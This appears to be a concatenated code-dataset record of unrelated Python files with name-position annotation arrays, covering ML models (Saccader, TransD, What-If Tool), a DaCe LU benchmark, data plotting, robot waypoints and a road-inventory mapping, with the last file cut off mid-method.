from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060339901(StandaardPost):
def __init__(self):
super().__init__(
nummer='0603.39901',
beschrijving='Heropvoegen van betonstraatstenen volgens 6-3.4',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BestratingVanBetonstraatsteen',
attribuutURI='',
dotnotatie='',
defaultWaarde='',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='wordt gemapt 2.0',
mappingOpmerking='Activiteit [Heropvoegen] komt niet voor in de OTL',
standaardpostnummer='0603.39901')])
| [
[
[
62,
75
],
[
236,
249
]
],
[
[
130,
150
],
[
468,
488
]
],
[
[
222,
235
]
]
] |
import sys, inspect, re
from os.path import basename, split
__all__ = ['this_tests']
class RegisterTestsPerAPI:
apiTestsMap = dict()
@staticmethod
def this_tests(testedapi):
prev_frame = inspect.currentframe().f_back.f_back
pathfilename, line_number, test_function_name, lines, index = inspect.getframeinfo(prev_frame)
lineno_parentfunc, parent_func = get_parent_func(line_number, get_lines(pathfilename))
list_test = [{'file': basename(pathfilename), 'test': test_function_name , 'line': str(lineno_parentfunc)}]
fq_apiname = full_name_with_qualname(testedapi)
if fq_apiname in RegisterTestsPerAPI.apiTestsMap:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = RegisterTestsPerAPI.apiTestsMap[fq_apiname] + list_test
else:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = list_test
def this_tests(testedapi):
RegisterTestsPerAPI.this_tests(testedapi)
def full_name_with_qualname(testedapi):
return f'{testedapi.__module__}.{testedapi.__qualname__}'
def set_default(obj):
if isinstance(obj, set): return list(obj)
raise TypeError
def get_parent_func(lineno, lines):
for idx,l in enumerate(reversed(lines[:lineno])):
if re.match(f'^def test', l): return (lineno - (idx+1)), l
return None
def get_lines(file):
with open(file, 'r') as f: return f.readlines()
| [
[
[
7,
10
]
],
[
[
12,
19
],
[
210,
217
],
[
317,
324
]
],
[
[
21,
23
],
[
1245,
1247
]
],
[
[
44,
52
],
[
475,
483
]
],
[
[
54,
59
]
],
[
[
61,
68
]
],
[
[
93,
112
],
[
642,
661
],
[
733,
752
],
[
687,
706
],
[
816,
835
],
[
906,
925
]
],
[
[
878,
888
]
],
[
[
953,
976
],
[
582,
605
]
],
[
[
1057,
1068
]
],
[
[
1148,
1163
],
[
391,
406
]
],
[
[
1322,
1331
],
[
420,
429
]
]
] |
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import math
import numpy as np
import dace
import polybench
N = dace.symbol('N')
#datatypes = [dace.float64, dace.int32, dace.float32]
datatype = dace.float64
# Dataset sizes
sizes = [{N: 40}, {N: 120}, {N: 400}, {N: 2000}, {N: 4000}]
args = [([N, N], datatype)]
def init_array(A):
n = N.get()
for i in range(0, n, 1):
for j in range(0, i + 1, 1):
# Python does modulo, while C does remainder ...
A[i, j] = datatype(-(j % n)) / n + 1
for j in range(i + 1, n, 1):
A[i, j] = datatype(0)
A[i, i] = datatype(1)
A[:] = np.dot(A, np.transpose(A))
@dace.program(datatype[N, N])
def lu(A):
for i in range(0, N, 1):
for j in range(0, i, 1):
@dace.map
def k_loop1(k: _[0:j]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
@dace.tasklet
def div():
ij_in << A[i, j]
jj_in << A[j, j]
out >> A[i, j]
out = ij_in / jj_in
for j in range(i, N, 1):
@dace.map
def k_loop2(k: _[0:i]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
if __name__ == '__main__':
polybench.main(sizes, args, [(0, 'A')], init_array, lu)
| [
[
[
83,
87
]
],
[
[
95,
106
],
[
670,
672
],
[
680,
682
]
],
[
[
114,
118
],
[
141,
145
],
[
224,
228
],
[
700,
704
],
[
816,
820
],
[
1028,
1032
],
[
1245,
1249
]
],
[
[
126,
135
],
[
1476,
1485
]
],
[
[
137,
138
],
[
264,
265
],
[
273,
274
],
[
283,
284
],
[
293,
294
],
[
304,
305
],
[
325,
326
],
[
328,
329
],
[
722,
723
],
[
725,
726
],
[
372,
373
],
[
762,
763
],
[
1224,
1225
]
],
[
[
213,
221
],
[
332,
340
],
[
713,
721
],
[
530,
538
],
[
616,
624
],
[
646,
654
]
],
[
[
254,
259
],
[
1491,
1496
]
],
[
[
315,
319
],
[
1498,
1502
]
],
[
[
349,
359
],
[
1516,
1526
]
],
[
[
733,
735
],
[
1528,
1530
]
]
] |
import pandas as pd
import numpy as np
COLORS_QTY: int = 5
# =============================================================================
# Argument parsing.
# =============================================================================
import argparse
from scipy import integrate
argument_parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="Plot figures based on run data.")
argument_default_values = {
"suffix": 'kissat_ibm',
"folder": "."
}
argument_parser.add_argument('-f', '--folder',
type=str,
action='store',
default=argument_default_values['folder'],
help="Folder in which to look for the file (default: '.')"
)
argument_parser.add_argument('-s', '--suffix',
type=str,
action='store',
default=argument_default_values['suffix'],
help="File suffix used in produce_run_data (default: 'kissat_ibm')"
)
parsed_parameters = argument_parser.parse_args()
folder: str = parsed_parameters.folder
suffix: str = parsed_parameters.suffix
# =============================================================================
# Finished parsing
# =============================================================================
def __rename_strategies__(df: pd.DataFrame) -> pd.DataFrame:
df["strategy"] = df["strategy"].str.replace(
".*-discrimination-based", "discrimination-based", regex=True)
df["strategy"] = df["strategy"].str.replace(
"Info. over Decision/Time", "information-based", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Random", "random", regex=False)
# Rename discrimination component
df["strategy"] = df["strategy"].str.replace(" 10100%", "", regex=False)
df["strategy"] = df["strategy"].str.replace(".00%", "%", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Subset", "subset", regex=False)
df["selection"] = df["strategy"].str.extract(r'^([^+]*) \+ .*')
df["discrimination"] = df["strategy"].str.extract(r'^[^+]* \+ (.*)')
return df
def __filter_best_strategies__(df: pd.DataFrame) -> pd.DataFrame:
# Remove all that don't have timeout correction
df["baseline"] = df["selection"].str.contains(
"random") | df["discrimination"].str.contains("subset")
return df
dico = {}
for i, configurations in enumerate(range(10, 60, 10)):
for j, split in enumerate(range(10, 60, 10)):
ratio = split / 100
detailed_df = pd.read_csv(f"{folder}/detailed_runs_{suffix}_{configurations}_{ratio}.csv")
detailed_df = detailed_df.drop("Unnamed: 0", axis=1)
detailed_df = __rename_strategies__(detailed_df)
df = __filter_best_strategies__(detailed_df)
# Remove subset
df = df[~df["discrimination"].str.contains("subset")]
# Take mean performance
df = df.groupby(["selection", "time"]).mean().reset_index()
df["prediction"] *= 100
for method in df["selection"].unique():
if method not in dico:
dico[method] = np.zeros((5, 5))
data = df[df["selection"] == method]
data = data[["prediction", "time"]].to_numpy()
auc = integrate.trapezoid(data[:, 0], dx=1, axis=0)
dico[method][i, j] = auc / 10000 * 100
COLOR_NAMES = [f"color{i+1}" for i in range(COLORS_QTY)]
for method, values in dico.items():
print("\\begin{table}")
print("\t\\centering")
print("\t\\caption{Percentage of total AUC Evolution for " + method + " on " + suffix.replace("_", " ") + "}")
print("\t\\begin{tabular}{"+ ("c" * 6) + "}")
print("\t\t\\toprule")
print("\t\tConfigurations & 10 & 20 & 30 & 40 & 50 \\\\")
mini = np.min(values)
maxi = np.max(values)
scale = maxi - mini
unit = scale / (len(COLOR_NAMES) - 1)
for j, percent in enumerate(range(10, 60, 10)):
line_values = [float(values[i, j])
for i, _ in enumerate(range(10, 60, 10))]
colors = [COLOR_NAMES[round((x - mini) / unit)] for x in line_values]
print(f"\t\t{percent}\\% & " + " & ".join(f"\\colorbox{{{color}!30}}{{{val:.1f}}}" for color, val in zip(colors, line_values)) + "\\\\")
print("\t\t\\bottomrule")
print("\t\\end{tabular}")
print("\\end{table}")
| [
[
[
7,
19
],
[
2680,
2682
],
[
1487,
1489
],
[
1470,
1472
],
[
2318,
2320
],
[
2301,
2303
]
],
[
[
27,
38
],
[
3261,
3263
],
[
3918,
3920
],
[
3945,
3947
]
],
[
[
40,
50
],
[
52,
55
],
[
3547,
3557
]
],
[
[
247,
255
],
[
328,
336
],
[
302,
310
]
],
[
[
275,
284
],
[
3405,
3414
]
],
[
[
285,
300
],
[
302,
325
],
[
479,
494
],
[
801,
816
],
[
1152,
1167
]
],
[
[
405,
428
],
[
647,
670
],
[
969,
992
]
],
[
[
1132,
1149
],
[
1196,
1213
],
[
1236,
1253
]
],
[
[
1182,
1188
],
[
1190,
1193
],
[
2695,
2701
]
],
[
[
1222,
1228
],
[
1230,
1233
],
[
2718,
2724
],
[
3736,
3742
]
],
[
[
1444,
1465
],
[
2840,
2861
]
],
[
[
2270,
2296
],
[
2888,
2914
]
],
[
[
2515,
2519
],
[
3224,
3228
],
[
3246,
3250
],
[
3463,
3467
],
[
3583,
3587
]
],
[
[
2529,
2530
],
[
3476,
3477
]
],
[
[
2532,
2546
],
[
2727,
2741
]
],
[
[
2588,
2589
],
[
3479,
3480
]
],
[
[
2591,
2596
],
[
2646,
2651
]
],
[
[
2638,
2643
],
[
2744,
2749
]
],
[
[
2666,
2677
],
[
2779,
2790
]
],
[
[
2765,
2776
],
[
2862,
2873
]
],
[
[
2826,
2837
],
[
2915,
2926
]
],
[
[
2883,
2885
],
[
2965,
2967
],
[
2969,
2971
]
],
[
[
2960,
2962
],
[
3059,
3061
]
],
[
[
3054,
3056
],
[
3122,
3124
],
[
3169,
3171
],
[
3298,
3300
],
[
3301,
3303
]
],
[
[
3159,
3165
],
[
3210,
3216
],
[
3251,
3257
],
[
3320,
3326
],
[
3468,
3474
]
],
[
[
3291,
3295
],
[
3347,
3351
]
],
[
[
3340,
3344
],
[
3425,
3429
]
],
[
[
3399,
3402
],
[
3484,
3487
]
],
[
[
3503,
3514
],
[
4008,
4019
],
[
4204,
4215
]
],
[
[
3565,
3571
],
[
3717,
3723
]
],
[
[
3573,
3579
],
[
3925,
3931
],
[
3952,
3958
],
[
4107,
4113
]
],
[
[
3911,
3915
],
[
3979,
3983
],
[
4227,
4231
]
],
[
[
3938,
3942
],
[
3972,
3976
]
],
[
[
3964,
3969
],
[
3995,
4000
]
],
[
[
3988,
3992
],
[
4235,
4239
]
],
[
[
4034,
4035
],
[
4117,
4118
]
],
[
[
4037,
4044
],
[
4285,
4292
]
],
[
[
4086,
4097
],
[
4251,
4262
],
[
4385,
4396
]
],
[
[
4194,
4200
],
[
4377,
4383
]
]
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import math
import numpy as np
FIELD_SCORE_NUM_OFFSET=6
class Waypoints:
def __init__(self, path, side):
self.points = []
self.number = 0
self.Waypoints_Lap = 0
self.next_target_idx = -1
self.all_field_score = np.ones([18]) # field score state
self._load_waypoints(path, side)
print ('[waypoint]number of waypoints: '+str(len(self.points)))
def _load_waypoints(self, path, side):
with open(path) as f:
lines = csv.reader(f)
for l in lines:
# x,y,radian,target_idx(refer main code)
point = [float(n) for n in l]
point[2] = point[2]*math.pi/180.0
if side == 'r':
point[3] = int(point[3])
else:
point[3] = int(point[4])
print(" "+str(point))
self.points.append(point[0:4])
def get_next_waypoint(self):
self.number = self.number+1
if self.number == len(self.points):
self.Waypoints_Lap = self.Waypoints_Lap+1
print("[waypoint]next lap!!!!!!")
self.number = 0
#print("[waypoint]search target !!!!!!", self.all_field_score)
        for i in list(range(self.number, len(self.points))) + list(range(self.number)):
score_num = self.points[i][3]
#print("[waypoint]"+str(score_num))
            # waypoint not related to scoring
if score_num == -1:
                # On the first lap, also follow waypoints that are not related to scoring.
if self.Waypoints_Lap == 0:
return self.points[self.number][0:3]
continue
            # waypoint related to scoring
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
# if already get score, skip search
continue
else:
# if not get score, go to target
print("[waypoint]"+str(i)+"/"+str(len(self.points)))
self.number = i
return self.points[i][0:3]
print("[waypoint]got all field score !!!")
return self.points[self.number][0:3]
def get_current_waypoint(self):
return self.points[self.number]
def get_current_target_number(self):
# target No.
return self.points[self.number][3]
def get_any_waypoint(self, n):
return self.points[n]
def set_number(self, n):
self.number = n
def set_field_score(self, n):
self.all_field_score = n
# print(self.all_field_score)
def check_if_get_field_score(self, n):
score_num = n
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
return True
else:
return False
# if __name__ == "__main__":
# Waypoints('waypoints.csv')
| [
[
[
54,
57
],
[
557,
560
]
],
[
[
65,
69
],
[
738,
742
]
],
[
[
77,
88
],
[
315,
317
]
],
[
[
90,
112
],
[
1771,
1793
],
[
2705,
2727
]
],
[
[
122,
131
]
]
] |
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Saccader-Classification network model.
Saccader model is an image classification model with a hard attention mechanism.
The model uses the saccader model for visual attention
and uses a separate network for classification.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from saccader import utils
from saccader.visual_attention import saccader
from tensorflow.contrib import slim as contrib_slim
from tensorflow_models.slim.nets import nets_factory
from tensorflow_models.slim.nets.nasnet import nasnet
slim = contrib_slim
Saccader = saccader.Saccader
class SaccaderClassNet(Saccader):
"""Saccader-Classification Model.
Network that performs classification on images by taking glimpses at
different locations on an image.
Attributes:
num_classes: (Integer) Number of classification classes.
variable_scope: (String) Name of model variable scope.
attention_groups: (Integer) Number of groups in attention network.
attention_layers_per_group: (Integer) Number of layers in each group in
attention network.
saccader_cell: Saccader Cell object.
representation_network: Representation network object.
glimpse_shape: 2-D tuple of integers indicating glimpse shape.
glimpse_shape_classnet: 2-D tuple of integers indicating classification
network glimpse shape.
glimpse_shape_saccader: 2-D tuple of integers indicating saccader
glimpse shape.
var_list_representation_network: List of variables for the representation
network.
var_list_attention_network: List of variables for the attention network.
var_list_saccader_cell: List of variables for the saccader cell.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list_classnet: List of variables for the classification network.
var_list: List of all model variables.
init_op: Initialization operations for model variables.
"""
def __init__(self, config, variable_scope="saccader_classnet"):
Saccader.__init__(self, config, variable_scope=variable_scope+"/saccader")
self.var_list_saccader = []
self.var_list_classnet = []
self.classnet_type = config.classnet_type
self.num_classes = config.num_classes
self.variable_scope_classnet = variable_scope+"/"+self.classnet_type
self.glimpse_shape_saccader = (-1, -1)
self.glimpse_shape_classnet = config.glimpse_shape
def __call__(self,
images_saccader,
images_classnet,
num_times,
is_training_saccader=False,
is_training_classnet=False,
policy="learned",
stop_gradient_after_representation=False):
logits, locations_t, best_locations_t, endpoints = Saccader.__call__(
self,
images_saccader,
num_times,
is_training=is_training_saccader,
policy=policy,
stop_gradient_after_representation=stop_gradient_after_representation)
self.glimpse_shape_saccader = self.glimpse_shape
image_size_saccader = images_saccader.shape.as_list()[1]
image_size_classnet = images_classnet.shape.as_list()[1]
if self.glimpse_shape_classnet[0] < 0:
self.glimpse_shape_classnet = tuple([int(
image_size_classnet / image_size_saccader *
self.glimpse_shape[0])] * 2)
self.glimpse_shape = self.glimpse_shape_classnet
images_glimpse_t = []
for locations in locations_t:
images_glimpse = utils.extract_glimpse(
images_classnet, size=self.glimpse_shape_classnet, offsets=locations)
images_glimpse_t.append(images_glimpse)
batch_size = images_classnet.shape.as_list()[0]
images_glimpse_t = tf.concat(images_glimpse_t, axis=0)
variables_before = set(tf.global_variables())
reuse = True if self.var_list_classnet else False
with tf.variable_scope(self.variable_scope_classnet, reuse=reuse):
if self.classnet_type == "nasnet":
classnet_config = nasnet.large_imagenet_config()
classnet_config.use_aux_head = 0
classnet_config.drop_path_keep_prob = 1.0
with slim.arg_scope(nasnet.nasnet_large_arg_scope()):
classnet_logits, endpoints_ = nasnet.build_nasnet_large(
images_glimpse_t, self.num_classes,
is_training=is_training_classnet,
config=classnet_config)
elif self.classnet_type == "resnet_v2_50":
network = nets_factory.get_network_fn(
"resnet_v2_50", self.num_classes, is_training=is_training_classnet)
classnet_logits, endpoints_ = network(images_glimpse_t)
endpoints["classnet"] = endpoints_
variables_after = set(tf.global_variables())
logits_t = tf.reshape(classnet_logits, (num_times, batch_size, -1))
logits = tf.reduce_mean(logits_t, axis=0)
if not reuse:
self.var_list_saccader = self.var_list_classification + self.var_list_location
self.var_list_classnet = [
v for v in list(variables_after-variables_before)
if "global_step" not in v.op.name]
self.var_list.extend(self.var_list_classnet)
self.init_op = tf.variables_initializer(var_list=self.var_list)
return logits, locations_t, best_locations_t, endpoints
| [
[
[
863,
878
]
],
[
[
902,
910
]
],
[
[
935,
949
]
],
[
[
958,
984
],
[
4443,
4445
],
[
4507,
4509
],
[
4593,
4595
],
[
5415,
5417
],
[
5453,
5455
],
[
5523,
5525
],
[
5869,
5871
]
],
[
[
1007,
1012
],
[
4218,
4223
]
],
[
[
1051,
1059
],
[
1252,
1260
]
],
[
[
1091,
1111
],
[
1228,
1240
]
],
[
[
1152,
1164
],
[
5176,
5188
]
],
[
[
1212,
1218
],
[
4722,
4728
],
[
4872,
4878
],
[
4946,
4952
]
],
[
[
1221,
1225
],
[
4857,
4861
]
],
[
[
1241,
1249
],
[
1295,
1303
],
[
2757,
2765
],
[
3500,
3508
]
],
[
[
1278,
1294
]
]
] |
from typing import Any
class Page(object):
start: int
end: int
domain: str
all_urls: Any
m3u8_dict: dict
__slots__ = ("start", "end", "domain", "all_urls", "m3u8_dict")
def __init__(self, start, end, domain, all_urls = [], **m3u8_dict):
# super().__init__()
self.start = start
self.end = end
self.domain = domain
self.all_urls = all_urls
self.m3u8_dict = m3u8_dict
| [
[
[
7,
11
]
]
] |
import config
import models
import tensorflow as tf
import numpy as np
import os
from sys import argv
os.environ['CUDA_VISIBLE_DEVICES']='0'
#Input training files from benchmarks/FB15K/ folder.
con = config.Config()
#True: Input test files from the same folder.
con.set_in_path("./benchmarks/FB15K237/")
con.set_test_link_prediction(True)
# con.set_test_triple_classification(True)
con.set_work_threads(8)
con.set_train_times(1000)
con.set_nbatches(100)
con.set_alpha(1.0)
con.set_margin(4.0)
con.set_bern(1)
con.set_dimension(200)
con.set_ent_neg_rate(25)
con.set_rel_neg_rate(0)
con.set_opt_method("SGD")
#Models will be exported via tf.Saver() automatically.
con.set_export_files("./res/model.vec.tf", 0)
#Model parameters will be exported to json files automatically.
con.set_out_files("./res/embedding.vec.json")
#Initialize experimental settings.
con.init()
#Set the knowledge embedding model
con.set_model(models.TransD)
#Train the model.
con.run()
#To test models after training needs "set_test_flag(True)".
con.test()
| [
[
[
7,
13
],
[
201,
207
]
],
[
[
21,
27
],
[
915,
921
]
],
[
[
35,
51
]
],
[
[
59,
70
]
],
[
[
78,
80
],
[
103,
105
]
],
[
[
97,
101
]
],
[
[
195,
198
],
[
263,
266
],
[
305,
308
],
[
383,
386
],
[
407,
410
],
[
433,
436
],
[
455,
458
],
[
474,
477
],
[
494,
497
],
[
510,
513
],
[
533,
536
],
[
558,
561
],
[
582,
585
],
[
664,
667
],
[
774,
777
],
[
855,
858
],
[
901,
904
],
[
948,
951
],
[
1018,
1021
]
]
] |
from database.database_util import connect_to_skip_database
from skip_dataset.generate_histogram import generate_histogram
from skip_dataset.generate_track_data import generate_track_data
from skip_dataset.plot_track_sum import plot_track_sum
# File used to execute different functions related to Spotify Sequential Skip Prediction Challenge dataset.
# The functions are roughly grouped in different categories.
# Recommended use is to only execute one at the time,
# each function is explained in the associated file.
if __name__ == '__main__':
# Establish a database connection.
connect_to_skip_database()
# generate_track_data()
# plot_track_sum()
generate_histogram()
| [
[
[
35,
59
],
[
590,
614
]
],
[
[
104,
122
],
[
675,
693
]
],
[
[
168,
187
]
],
[
[
228,
242
]
]
] |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import googleapiclient.discovery
import os
import tensorflow as tf
from IPython import display
from google.protobuf import json_format
from numbers import Number
from six import ensure_str
from tensorboard.plugins.interactive_inference.utils import inference_utils
# Constants used in mutant inference generation.
NUM_MUTANTS_TO_GENERATE = 10
NUM_EXAMPLES_FOR_MUTANT_ANALYSIS = 50
# Custom user agent for tracking number of calls to Cloud AI Platform.
USER_AGENT_FOR_CAIP_TRACKING = 'WhatIfTool'
class WitWidgetBase(object):
"""WIT widget base class for common code between Jupyter and Colab."""
def __init__(self, config_builder):
"""Constructor for WitWidgetBase.
Args:
config_builder: WitConfigBuilder object containing settings for WIT.
"""
tf.logging.set_verbosity(tf.logging.WARN)
config = config_builder.build()
copied_config = dict(config)
self.estimator_and_spec = (
dict(config.get('estimator_and_spec'))
if 'estimator_and_spec' in config else {})
self.compare_estimator_and_spec = (
dict(config.get('compare_estimator_and_spec'))
if 'compare_estimator_and_spec' in config else {})
if 'estimator_and_spec' in copied_config:
del copied_config['estimator_and_spec']
if 'compare_estimator_and_spec' in copied_config:
del copied_config['compare_estimator_and_spec']
self.custom_predict_fn = (
config.get('custom_predict_fn')
if 'custom_predict_fn' in config else None)
self.compare_custom_predict_fn = (
config.get('compare_custom_predict_fn')
if 'compare_custom_predict_fn' in config else None)
self.adjust_prediction_fn = (
config.get('adjust_prediction')
if 'adjust_prediction' in config else None)
self.compare_adjust_prediction_fn = (
config.get('compare_adjust_prediction')
if 'compare_adjust_prediction' in config else None)
self.adjust_example_fn = (
config.get('adjust_example')
if 'adjust_example' in config else None)
self.compare_adjust_example_fn = (
config.get('compare_adjust_example')
if 'compare_adjust_example' in config else None)
if 'custom_predict_fn' in copied_config:
del copied_config['custom_predict_fn']
if 'compare_custom_predict_fn' in copied_config:
del copied_config['compare_custom_predict_fn']
if 'adjust_prediction' in copied_config:
del copied_config['adjust_prediction']
if 'compare_adjust_prediction' in copied_config:
del copied_config['compare_adjust_prediction']
if 'adjust_example' in copied_config:
del copied_config['adjust_example']
if 'compare_adjust_example' in copied_config:
del copied_config['compare_adjust_example']
self.set_examples(config['examples'])
del copied_config['examples']
self.config = copied_config
# If using AI Platform for prediction, set the correct custom prediction
# functions.
if self.config.get('use_aip'):
self.custom_predict_fn = self._predict_aip_model
if self.config.get('compare_use_aip'):
self.compare_custom_predict_fn = self._predict_aip_compare_model
def _get_element_html(self):
return """
<link rel="import" href="/nbextensions/wit-widget/wit_jupyter.html">"""
def set_examples(self, examples):
"""Sets the examples shown in WIT.
The examples are initially set by the examples specified in the config
builder during construction. This method can change which examples WIT
displays.
"""
self.examples = [json_format.MessageToJson(ex) for ex in examples]
self.updated_example_indices = set(range(len(examples)))
def json_to_proto(self, json):
ex = (tf.train.SequenceExample()
if self.config.get('are_sequence_examples')
else tf.train.Example())
json_format.Parse(json, ex)
return ex
def infer_impl(self):
"""Performs inference on examples that require inference."""
indices_to_infer = sorted(self.updated_example_indices)
examples_to_infer = [
self.json_to_proto(self.examples[index]) for index in indices_to_infer]
infer_objs = []
attribution_objs = []
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
self.updated_example_indices = set()
return {
'inferences': {'indices': indices_to_infer, 'results': infer_objs},
'label_vocab': self.config.get('label_vocab'),
'attributions': attribution_objs}
def infer_mutants_impl(self, info):
"""Performs mutant inference on specified examples."""
example_index = int(info['example_index'])
feature_name = info['feature_name']
examples = (self.examples if example_index == -1
else [self.examples[example_index]])
examples = [self.json_to_proto(ex) for ex in examples]
scan_examples = [self.json_to_proto(ex) for ex in self.examples[0:50]]
serving_bundles = []
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn))
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn))
viz_params = inference_utils.VizParams(
info['x_min'], info['x_max'],
scan_examples, 10,
info['feature_index_pattern'])
return inference_utils.mutant_charts_for_feature(
examples, feature_name, serving_bundles, viz_params)
def get_eligible_features_impl(self):
"""Returns information about features eligible for mutant inference."""
examples = [self.json_to_proto(ex) for ex in self.examples[
0:NUM_EXAMPLES_FOR_MUTANT_ANALYSIS]]
return inference_utils.get_eligible_features(
examples, NUM_MUTANTS_TO_GENERATE)
def create_sprite(self):
"""Returns an encoded image of thumbnails for image examples."""
# Generate a sprite image for the examples if the examples contain the
# standard encoded image feature.
if not self.examples:
return None
example_to_check = self.json_to_proto(self.examples[0])
feature_list = (example_to_check.context.feature
if self.config.get('are_sequence_examples')
else example_to_check.features.feature)
if 'image/encoded' in feature_list:
example_strings = [
self.json_to_proto(ex).SerializeToString()
for ex in self.examples]
encoded = ensure_str(base64.b64encode(
inference_utils.create_sprite_image(example_strings)))
return 'data:image/png;base64,{}'.format(encoded)
else:
return None
def _json_from_tf_examples(self, tf_examples):
json_exs = []
feature_names = self.config.get('feature_names')
for ex in tf_examples:
# Create a JSON list or dict for each example depending on settings.
# Strip out any explicitly-labeled target feature from the example.
      # This is needed because AI Platform models that accept JSON cannot handle
      # requests in which non-input features are included in the object to run
      # prediction on.
if self.config.get('uses_json_list'):
json_ex = []
for feat in ex.features.feature:
if feature_names and feat in feature_names:
feat_idx = feature_names.index(feat)
else:
feat_idx = int(feat)
if (feat == self.config.get('target_feature') or
feat_idx == self.config.get('target_feature')):
continue
# Ensure the example value list is long enough to add the next feature
# from the tf.Example.
if feat_idx >= len(json_ex):
json_ex.extend([None] * (feat_idx - len(json_ex) + 1))
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat_idx] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat_idx] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat_idx] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
else:
json_ex = {}
for feat in ex.features.feature:
if feat == self.config.get('target_feature'):
continue
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
json_exs.append(json_ex)
return json_exs
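  # Illustrative note (added comment, not from the original source): depending on
  # the 'uses_json_list' setting, the method above yields either a list per
  # example, e.g. [0, 39.0, 'Private'], or a dict per example, e.g.
  # {'age': 0, 'hours': 39.0, 'workclass': 'Private'}; these feature names and
  # values are hypothetical.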
def _predict_aip_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address'),
self.config.get('model_name'), self.config.get('model_signature'),
self.config.get('force_json_input'), self.adjust_example_fn,
self.adjust_prediction_fn)
def _predict_aip_compare_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address_2'),
self.config.get('model_name_2'), self.config.get('model_signature_2'),
self.config.get('compare_force_json_input'),
self.compare_adjust_example_fn,
self.compare_adjust_prediction_fn)
def _predict_aip_impl(self, examples, project, model, version, force_json,
adjust_example, adjust_prediction):
"""Custom prediction function for running inference through AI Platform."""
# Set up environment for GCP call for specified project.
os.environ['GOOGLE_CLOUD_PROJECT'] = project
service = googleapiclient.discovery.build('ml', 'v1', cache_discovery=False)
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
# Properly package the examples to send for prediction.
if self.config.get('uses_json_input') or force_json:
